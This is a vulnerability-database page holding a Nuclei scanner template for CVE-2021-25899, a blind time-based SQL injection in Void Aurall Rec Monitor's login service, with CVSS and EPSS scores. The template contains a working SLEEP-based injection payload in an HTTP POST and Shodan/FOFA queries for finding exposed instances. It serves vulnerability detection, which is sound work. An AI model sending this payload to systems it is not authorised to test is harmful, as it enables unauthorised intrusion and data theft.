Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-25899
HistoryOct 01, 2022 - 8:15 a.m.

Void Aural Rec Monitor 9.0.0.1 - SQL Injection

2022-10-0108:15:59
ProjectDiscovery
github.com
9
cve2021
sqli
void
aurall
cve-2021-25899
cwe-89

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.48 Medium

EPSS

Percentile

97.5%

Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2021-25899

info:
  name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25899
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-25899
    cwe-id: CWE-89
    epss-score: 0.51506
    epss-percentile: 0.9756
    cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: void
    product: aurall_rec_monitor
    shodan-query:
      - html:"AURALL"
      - http.html:"aurall"
    fofa-query: body="aurall"
  tags: cve2021,cve,sqli,void,aurall

http:
  - raw:
      - |
        @timeout: 15s
        POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Contacte con el administrador")'
        condition: and
# digest: 4b0a00483046022100b913f246ed52547b6cf8d38eeb886a9c8e6ccdfd54a5fb9dfed931be1b37c98e022100f1d8901f4edf04df3a1e544f734cd3941996ac96dc7776e05744fcacf027eac5:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.48 Medium

EPSS

Percentile

97.5%

Related for NUCLEI:CVE-2021-25899